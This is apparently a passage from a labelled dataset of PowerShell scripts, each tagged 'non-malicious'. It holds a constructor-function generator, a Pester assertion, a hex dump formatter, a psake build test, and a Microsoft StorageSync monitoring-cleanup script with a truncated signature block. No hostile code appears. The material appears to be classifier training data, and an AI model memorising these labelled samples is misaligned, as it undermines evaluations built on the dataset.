$Properties) { $null = $PropertyNames.AppendFormat(",'{0}'",$p.Name) switch( $p.MemberType ) { Event { $null = $PropertyNames.AppendFormat(",'{0}__'",$p.Name) $null = $Parameters.AppendFormat(@' [Parameter()] [PSObject]${{On_{0}}} , '@, $p.Name) } Property { if($p.Name -match "^$($CodeGenContentProperties -Join '$|^')`$") { $null = $Parameters.AppendFormat(@' [Parameter(Position=1,ValueFromPipeline=$true)] [Object[]]${{{0}}} , '@, $p.Name) $Pipelineable += @(Add-Member -in $p.Name -Type NoteProperty -Name "IsCollection" -Value $($p.PropertyType.GetInterface([System.Collections.IList]) -ne $null) -Passthru) } elseif($p.PropertyType -eq [System.Boolean]) { $null = $Parameters.AppendFormat(@' [Parameter()] [Switch]${{{0}}} , '@, $p.Name) } else { $null = $Parameters.AppendFormat(@' [Parameter()] [Object[]]${{{0}}} , '@, $p.Name) } } } } $null = $Parameters.Append(' [Parameter(ValueFromRemainingArguments=$true)] [string[]]$DependencyProps )') $null = $PropertyNames.Remove(2,1).Append(')') $collectable = [bool]$(@(foreach($p in @($Pipelineable)){$p.IsCollection}) -contains $true) $ofs = "`n"; $function = $( " if(!( '$TypeName' -as [Type] )) { $( if( $T.Assembly.GlobalAssemblyCache ) { " `$null = [Reflection.Assembly]::Load( '$($T.Assembly.FullName)' ) " } else { " `$null = [Reflection.Assembly]::LoadFrom( '$($T.Assembly.Location)' ) " } ) } ## if(`$ExecutionContext.SessionState.Module.Guid -ne (Get-ReflectionModule).Guid) { ## Write-Warning `"$($T.Name) not invoked in ReflectionModule context. Attempting to reinvoke.`" ## # `$scriptParam = `$PSBoundParameters ## # return iex `"& (Get-ReflectionModule) '`$(`$MyInvocation.MyCommand.Path)' ```@PSBoundParameters`" ## } Write-Verbose ""$($T.Name) in module `$(`$executioncontext.sessionstate.module) context!"" function New-$TypeName { <# .Synopsis Create a new $($T.Name) object .Description Generates a new $TypeName object, and allows setting all of it's properties. (From the $($T.Assembly.GetName().Name) assembly v$($T.Assembly.GetName().Version)) .Notes GENERATOR : $((Get-ReflectionModule).Name) v$((Get-ReflectionModule).Version) by Joel Bennett http://HuddledMasses.org GENERATED : $(Get-Date) ASSEMBLY : $($T.Assembly.FullName) FULLPATH : $($T.Assembly.Location) #> $Parameters BEGIN { `$DObject = New-Object $TypeName `$All = $PropertyNames } PROCESS { " if(!$collectable) { " # The content of $TypeName is not a collection # So if we're in a pipeline, make a new $($T.Name) each time if(`$_) { `$DObject = New-Object $TypeName } " } @' foreach($key in @($PSBoundParameters.Keys) | where { $PSBoundParameters[$_] -is [ScriptBlock] }) { $PSBoundParameters[$key] = $PSBoundParameters[$key].GetNewClosure() } Set-ObjectProperties @($PSBoundParameters.GetEnumerator() | Where { [Array]::BinarySearch($All,($_.Key -replace "^On_(.*)",'$1__')) -ge 0 } ) ([ref]$DObject) '@ if(!$collectable) { @' Microsoft.PowerShell.Utility\\Write-Output $DObject } #Process '@ } else { @' } #Process END { Microsoft.PowerShell.Utility\\Write-Output $DObject } '@ } @" } ## New-$TypeName `@PSBoundParameters "@ ) Set-Content -Path $ScriptPath -Value $Function } # Note: set the aliases global for now, because it's too late to export them # E.g.: New-Button = New-System.Windows.Controls.Button Set-Alias -Name "New-$($T.Name)" "New-$TypeName" -ErrorAction SilentlyContinue -ErrorVariable +ErrorList -Scope Global -Passthru:(!$Quiet) if($ShortAliases) { # E.g.: Button = New-System.Windows.Controls.Button Set-Alias -Name $T.Name "New-$TypeName" -ErrorAction SilentlyContinue -ErrorVariable +ErrorList -Scope Global -Passthru:(!$Quiet) } New-AutoLoad -Name $ScriptPath -Alias "New-$TypeName" } }#PROCESS } function Import-ConstructorFunctions { #.Synopsis # Autoload pre-generated constructor functions and generate aliases for them. #.Description # Parses the New-* scripts in the specified path, and uses the Autoload module to pre-load them as commands and set up aliases for them, without parsing them into memory. #.Parameter Path # The path to a folder with functions to preload param( [Parameter()] [Alias("PSPath")] [string[]]$Path = "$PSScriptRoot\\Types_Generated" ) end { $Paths = $(foreach($p in $Path) { Join-Path $p "New-*.ps1" }) Write-Verbose "Importing Constructors from: `n`t$($Paths -join "`n`t")" foreach($script in Get-ChildItem $Paths -ErrorAction 0) { $TypeName = $script.Name -replace 'New-(.*).ps1','$1' $ShortName = ($TypeName -split '\\.')[-1] Write-Verbose "Importing constructor for type: $TypeName ($ShortName)" # Note: set the aliases global for now, because it's too late to export them # E.g.: New-Button = New-System.Windows.Controls.Button Set-Alias -Name "New-$ShortName" "New-$TypeName" -ErrorAction SilentlyContinue -ErrorVariable +ErrorList -Scope Global -Passthru:(!$Quiet) if($ShortAliases) { # E.g.: Button = New-System.Windows.Controls.Button Set-Alias -Name $ShortName "New-$TypeName" -ErrorAction SilentlyContinue -ErrorVariable +ErrorList -Scope Global -Passthru:(!$Quiet) } New-Autoload -Name $Script.FullName -Alias "New-$TypeName" # Write-Host -fore yellow $(Get-Command "New-$TypeName" | Out-String) Get-Command "New-$TypeName" } } } #.Parameter Snapin # The full path to where the snapin .dll is #.Parameter OutputPath # Force the module manifest(s) to output in a different location than where the snapin .dll is #.Parameter ModuleName # Override the snapin name(s) for the module manifest #.Parameter Author # Overrides the Company Name from the manifest when generating the module's "Author" comment #.Parameter Passthru # Returns the ModuleManifest (same as -Passthru on New-ModuleManifest) #.Example # New-ModuleManifestFromSnapin ".\\Quest Software\\Management Shell for AD" -ModuleName QAD # # Description # ----------- # Generates a new module manifest file: QAD.psd1 in the folder next to the Quest.ActiveRoles.ArsPowerShellSnapIn.dll #.Example # New-ModuleManifestFromSnapin "C:\\Program Files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\" -Output $pwd # # Description # ----------- # Generates module manifest files for the SqlServer PSSnapins and stores them in the current folder function New-ModuleManifestFromSnapin { param( [Parameter(Mandatory=$true, Position="0", ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias("FullName")] [String[]]$Snapin , [Parameter()] $OutputPath , [Parameter()] $ModuleName , [Parameter()] [String]$Author , [Switch]$Passthru ) # $SnapinPath = $(Get-ChildItem $SnapinPath -Filter *.dll) $EAP = $ErrorActionPreference $ErrorActionPreference = "SilentlyContinue" Add-Assembly $Snapin $ErrorActionPreference = $EAP $SnapinTypes = Get-Assembly $Snapin | Get-Type -BaseType System.Management.Automation.PSSnapIn, System.Management.Automation.CustomPSSnapIn -WarningAction SilentlyContinue foreach($SnapinType in $SnapinTypes) { $Installer = New-Object $SnapinType if(!$PSBoundParameters.ContainsKey("OutputPath")) { $OutputPath = (Split-Path $SnapinType.Assembly.Location) } if(!$PSBoundParameters.ContainsKey("ModuleName")) { $ModuleName = $Installer.Vendor } if(!$PSBoundParameters.ContainsKey("Author")) { $Author = $Installer.Name } $ManifestPath = (Join-Path $OutputPath "$ModuleName.psd1") Write-Verbose "Creating Module Manifest: $ManifestPath" $RequiredAssemblies = @( $SnapinType.Assembly.GetReferencedAssemblies() | Get-Assembly | Where-Object { (Split-Path $_.Location) -eq (Split-Path $SnapinType.Assembly.Location) } | Select-Object -Expand Location | Resolve-Path -ErrorAction Continue) # New-ModuleManifest has a bad bug -- it makes paths relative to the current location (and it does it wrong). Push-Location $OutputPath if($Installer -is [System.Management.Automation.CustomPSSnapIn]) { $Cmdlets = $Installer.Cmdlets | Select-Object -Expand Name $Types = $Installer.Types | Select-Object -Expand FileName | %{ $path = Resolve-Path $_ -ErrorAction Continue; if(!$path){ $_ } else { $path } } $Formats = $Installer.Formats | Select-Object -Expand FileName | %{ $path = Resolve-Path $_ -ErrorAction Continue; if(!$path){ $_ } else { $path } } } else { $Types = $Installer.Types | %{ $path = Resolve-Path $_ -ErrorAction Continue; if(!$path){ $_ } else { $path } } $Formats = $Installer.Formats | %{ $path = Resolve-Path $_ -ErrorAction Continue; if(!$path){ $_ } else { $path } } } if(!$Cmdlets) { $Cmdlets = "*" } if(!$Types) { $Types = @() } if(!$Formats) { $Formats = @() } New-ModuleManifest -Path $ManifestPath -Author $Author -Company $Installer.Vendor -Description $Installer.Description ` -ModuleToProcess $SnapinType.Assembly.Location -Types $Types -Formats $Formats -Cmdlets $Cmdlets ` -RequiredAssemblies $RequiredAssemblies -Passthru:$Passthru ` -NestedModules @() -Copyright $Installer.Vendor -FileList @() Pop-Location } } ############################################################################### Add-Accelerator list System.Collections.Generic.List``1 Add-Accelerator dictionary System.Collections.Generic.Dictionary``2 Set-Alias aasm Add-Assemb
combined_dataset/train/non-malicious/3037.ps1
3037.ps1
function Should-BeLikeExactly($ActualValue, $ExpectedValue, [switch] $Negate, [String] $Because) { [bool] $succeeded = $ActualValue -clike $ExpectedValue if ($Negate) { $succeeded = -not $succeeded } if (-not $succeeded) { if ($Negate) { return New-Object psobject -Property @{ Succeeded = $false FailureMessage = "Expected case sensitive like wildcard $(Format-Nicely $ExpectedValue) to not match $(Format-Nicely $ActualValue),$(Format-Because $Because) but it did match." } } else { return New-Object psobject -Property @{ Succeeded = $false FailureMessage = "Expected case sensitive like wildcard $(Format-Nicely $ExpectedValue) to match $(Format-Nicely $ActualValue),$(Format-Because $Because) but it did not match." } } } return New-Object psobject -Property @{ Succeeded = $true } } Add-AssertionOperator -Name BeLikeExactly ` -InternalName Should-BeLikeExactly ` -Test ${function:Should-BeLikeExactly} function ShouldBeLikeExactlyFailureMessage() { } function NotShouldBeLikeExactlyFailureMessage() { }
combined_dataset/train/non-malicious/Format-HexString.ps1
Format-HexString.ps1
## Format-HexString.ps1 ## Format a byte array as a hexadecimal string ## ## Example usage: ## get-content 'c:\\windows\\Coffee Bean.bmp' -encoding byte | Format-HexString | more ## Convert the input to an array of bytes. This is a strongly-typed variable, ## so that we're not trying to iterate over strings, directory entries, etc. ## [byte[]] $bytes = $(foreach($byte in $input) { $byte }) begin { ## Store our header, and formatting information $counter = 0 $header = " 0 1 2 3 4 5 6 7 8 9 A B C D E F" $nextLine = "{0} " -f [Convert]::ToString($counter, 16).ToUpper().PadLeft(8, '0') $asciiEnd = "" ## Output the header "`r`n$header`r`n" } process { ## Display each byte, in 2-digit hexidecimal, and add that to the left-hand ## side. $nextLine += "{0:X2} " -f $_ ## If the character is printable, add its ascii representation to ## the right-hand side. Otherwise, add a dot to the right hand side. if(($_ -ge 0x20) -and ($_ -le 0xFE)) { $asciiEnd += [char] $_ } else { $asciiEnd += "." } $counter++; ## If we've hit the end of a line, combine the right half with the left half, ## and start a new line. if(($counter % 16) -eq 0) { "$nextLine $asciiEnd" $nextLine = "{0} " -f [Convert]::ToString($counter, 16).ToUpper().PadLeft(8, '0') $asciiEnd = ""; } } end { ## At the end of the file, we might not have had the chance to output the end ## of the line yet. Only do this if we didn't exit on the 16-byte boundary, ## though. if(($counter % 16) -ne 0) { while(($counter % 16) -ne 0) { $nextLine += " " $asciiEnd += " " $counter++; } "$nextLine $asciiEnd" } "" }
combined_dataset/train/non-malicious/2952.ps1
2952.ps1
Properties { $x = 1 } Task default -Depends RunNested1, RunNested2, CheckX Task RunNested1 { Invoke-psake .\nested\nested1.ps1 } Task RunNested2 { Invoke-psake .\nested\nested2.ps1 } Task CheckX{ Assert ($x -eq 1) '$x was not 1' }
combined_dataset/train/non-malicious/sample_40_21.ps1
sample_40_21.ps1
#======================================================================================================================================================================= # Copyright (c) Microsoft Corporation. All rights reserved. # # Description: # RemoveMDS.ps1 # Kill all Monitoring processes and clean up trace logs. #======================================================================================================================================================================= param ( [Parameter(Mandatory=$true)] [string]$MDSFolder ) # Execution of the script begins here: $Error.Clear() $timestamp = Get-Date -UFormat "%Y%m%d-%H%M%S" $transcriptPath = Join-Path $env:TEMP "StorageSyncAgent-RemoveMDS-$timestamp.log" Start-Transcript -Path $transcriptPath try { # Killing MonAgentLauncher.exe terminates all child MA processes. $targetProcessName = "MonAgentLauncher" $processes = Get-Process -Name $targetProcessName -ErrorAction SilentlyContinue if ($processes) { foreach ($process in $processes) { $executablePath = $process.MainModule.FileName Write-Output "Found process $($process.Name) (ID: $($process.Id)) with executable path: $executablePath" $installDir = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure\StorageSync\Agent").InstallDir if ($executablePath.IndexOf($installDir, [StringComparison]::InvariantCultureIgnoreCase) -ge 0) # Confirm that the process belongs to us i.e is installed in our Agent directory { Write-Output "Terminating process $($process.Name) (ID: $($process.Id)) with executable path: $executablePath" Stop-Process -Id $process.Id -Force } } } else { Write-Output "No processes named '$targetProcessName.exe' found." } } catch { Write-Output "Exception occured while attempting to kill Monitoring Agent processes: $_" Write-Output "Ignoring failures while killing Monitoring Agent processes and proceeding with the script" } $Error.Clear() # Stop and Delete Logman trace sessions to cleanup logs. $logmanCleanupScriptBlock = { # Clean up UserMode traces. Write-Output "Stopping session AfsUserModeTraceSession" cmd /c "logman -stop -as AfsUserModeTraceSession" Write-Output "`nDeleting session AfsUserModeTraceSession" cmd /c "logman -delete AfsUserModeTraceSession" # Clean up KernelMode traces. Write-Output "Stopping session AfsKernelModeTraceSession" cmd /c "logman -stop -as AfsKernelModeTraceSession" Write-Output "`nDeleting session AfsKernelModeTraceSession" cmd /c "logman -delete AfsKernelModeTraceSession" } # Starting the cleanup job. $logmanCleanupJob = Start-Job -ScriptBlock $logmanCleanupScriptBlock # Waiting for job execution. Wait-Job -Job $logmanCleanupJob -Timeout 120 # Receiving the job to see script output. Wait-Job does not show output. $logmanCleanupResultJob = Receive-Job $logmanCleanupJob foreach ($output in $logmanCleanupResultJob) { Write-Host $output } $Error.Clear() # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBFfmwt2oOLDUAi # Qv16rGMBJCcZdA9XNvFfReAjR3bnzaCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIjq7gN6ZHqBaOqC2mo93hyF # F7VqmYYl124Q2y0J4aTcMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAmeoUtFcMsMc5106hM9g5NhlE6yZNt/rr8Dnxz4DHcXY+9kgvnb+ayyXK # e6Yf0gR7peNbdLLYLIbBnAF28l09bQEa3lr/beN3Jwug/W0VkNUD5MgE4oeBb7Qv # KtIxBEbmMMHJyC3hq7EZyA5FlKwvYxHu+G0SPpGdy8sVEpaU4RG4WEhFX+qnUlvJ # YbeenIYInZZJFaQ/48boDpCfoT9AIEXtLgnFF7cP1sbeX7YD/6RCjp/hMeSDp8ZS # yMCASVo5iM2mLUdjhsjPPBYJtoclRSYfg/loxpcTZ1v4PAUEK1NykwEsdRkMieRw # ZtOuihlwXoKem2OKm14x2YW3h8zqu6GCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCCCJUb/4jZ6ChgdvKFGxzUUsRSM2rOJuOJducaOYhPVrQIGZjK7qelj # GBMyMDI0MDUwMjE3NTMzNS45MDRaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTkzNS0w # M0UwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAekPcTB+XfESNgABAAAB6TANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # MjZaFw0yNTAzMDUxODQ1MjZaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTkzNS0wM0UwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQCsmowxQRVgp4TSc3nTa6yrAPJnV6A7aZYnTw/yx90u # 1DSH89nvfQNzb+5fmBK8ppH76TmJzjHUcImd845A/pvZY5O8PCBu7Gq+x5Xe6plQ # t4xwVUUcQITxklOZ1Rm9fJ5nh8gnxOxaezFMM41sDI7LMpKwIKQMwXDctYKvCyQy # 6kO2sVLB62kF892ZwcYpiIVx3LT1LPdMt1IeS35KY5MxylRdTS7E1Jocl30NgcBi # JfqnMce05eEipIsTO4DIn//TtP1Rx57VXfvCO8NSCh9dxsyvng0lUVY+urq/G8QR # FoOl/7oOI0Rf8Qg+3hyYayHsI9wtvDHGnT30Nr41xzTpw2I6ZWaIhPwMu5DvdkEG # zV7vYT3tb9tTviY3psul1T5D938/AfNLqanVCJtP4yz0VJBSGV+h66ZcaUJOxpbS # IjImaOLF18NOjmf1nwDatsBouXWXFK7E5S0VLRyoTqDCxHG4mW3mpNQopM/U1WJn # jssWQluK8eb+MDKlk9E/hOBYKs2KfeQ4HG7dOcK+wMOamGfwvkIe7dkylzm8BeAU # QC8LxrAQykhSHy+FaQ93DAlfQYowYDtzGXqE6wOATeKFI30u9YlxDTzAuLDK073c # ndMV4qaD3euXA6xUNCozg7rihiHUaM43Amb9EGuRl022+yPwclmykssk30a4Rp3v # 9QIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFJF+M4nFCHYjuIj0Wuv+jcjtB+xOMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQBWsSp+rmsxFLe61AE90Ken2XPgQHJDiS4S # bLhvzfVjDPDmOdRE75uQohYhFMdGwHKbVmLK0lHV1Apz/HciZooyeoAvkHQaHmLh # wBGkoyAAVxcaaUnHNIUS9LveL00PwmcSDLgN0V/Fyk20QpHDEukwKR8kfaBEX83A # yvQzlf/boDNoWKEgpdAsL8SzCzXFLnDozzCJGq0RzwQgeEBr8E4K2wQ2WXI/ZJxZ # S/+d3FdwG4ErBFzzUiSbV2m3xsMP3cqCRFDtJ1C3/JnjXMChnm9bLDD1waJ7TPp5 # wYdv0Ol9+aN0t1BmOzCj8DmqKuUwzgCK9Tjtw5KUjaO6QjegHzndX/tZrY792dfR # 